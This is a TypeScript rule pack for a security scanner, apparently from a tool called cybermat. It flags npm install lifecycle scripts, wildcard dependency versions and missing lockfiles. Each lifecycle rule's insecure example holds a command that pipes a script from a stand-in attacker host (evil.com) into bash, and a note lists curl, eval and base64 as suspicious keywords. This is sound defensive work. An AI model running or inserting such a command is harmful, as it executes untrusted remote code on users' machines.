import type { RulePack } from '@cybermat/shared';

const lifecycleRules = ['postinstall', 'preinstall', 'prepare', 'install'].map(scriptName => ({
  id: `supply-chain.lifecycle-${scriptName}`,
  name: `Lifecycle Script: ${scriptName}`,
  description: `package.json defines a "${scriptName}" lifecycle script that runs automatically on npm/pnpm/yarn install`,
  engine: 'dependency' as const,
  category: 'Supply Chain',
  severity: 'medium' as const,
  confidence: 'low' as const,
  owasp2025: ['A03 Software Supply Chain Failures'],
  cwe: ['CWE-506'],
  asvs: ['ASVS 14.2.4'],
  wstg: ['WSTG-CONF-05'],
  tags: ['lifecycle-script', 'supply-chain', 'npm'],
  enabledByDefault: true,
  safeForCI: true,
  requiresRuntime: false,
  requiresAuth: false,
  falsePositiveNotes: 'Low confidence for non-suspicious scripts. Review the script content manually. Suspicious commands (curl, eval, base64) escalate to high.',
  remediation: 'Audit this lifecycle script to ensure it only performs expected build operations. Use --ignore-scripts for untrusted packages.',
  insecureExample: `"${scriptName}": "curl https://evil.com/install.sh | bash"`,
  saferExample: `"${scriptName}": "tsc --build" // only deterministic build tools`,
}));

export const supplyChainPack: RulePack = {
  id: 'supply-chain',
  name: 'Supply Chain & Dependencies',
  description: 'Detects risky dependency patterns, suspicious lifecycle scripts, and missing lockfiles',
  rules: [
    ...lifecycleRules,
    {
      id: 'supply-chain.wildcard-version',
      name: 'Wildcard Dependency Version',
      description: 'A dependency uses a wildcard version (*) or "latest" — any version including one with vulnerabilities can be installed',
      engine: 'dependency',
      category: 'Supply Chain',
      severity: 'medium',
      confidence: 'high',
      owasp2025: ['A03 Software Supply Chain Failures'],
      cwe: ['CWE-1104'],
      asvs: ['ASVS 14.2.1'],
      wstg: ['WSTG-CONF-05'],
      tags: ['dependency', 'semver', 'supply-chain'],
      enabledByDefault: true,
      safeForCI: true,
      requiresRuntime: false,
      requiresAuth: false,
      remediation: 'Pin to a specific version or use a conservative semver range like "^x.y.z".',
      insecureExample: '"some-package": "*" // any version, including malicious ones',
      saferExample: '"some-package": "^2.3.1" // locked to minor/patch updates only',
    },
    {
      id: 'supply-chain.missing-lockfile',
      name: 'Missing Dependency Lockfile',
      description: 'No lockfile found (package-lock.json, pnpm-lock.yaml, yarn.lock, bun.lock) — dependency resolution is non-deterministic',
      engine: 'dependency',
      category: 'Supply Chain',
      severity: 'medium',
      confidence: 'high',
      owasp2025: ['A03 Software Supply Chain Failures'],
      cwe: ['CWE-1104'],
      asvs: ['ASVS 14.2.1'],
      wstg: ['WSTG-CONF-05'],
      tags: ['lockfile', 'dependency', 'supply-chain'],
      enabledByDefault: true,
      safeForCI: true,
      requiresRuntime: false,
      requiresAuth: false,
      remediation: 'Commit a lockfile to version control. Run pnpm install / npm install / yarn to generate one.',
      insecureExample: '// No pnpm-lock.yaml — each install may pull different dependency versions',
      saferExample: '// Commit pnpm-lock.yaml and use "pnpm install --frozen-lockfile" in CI',
    },
  ],
};
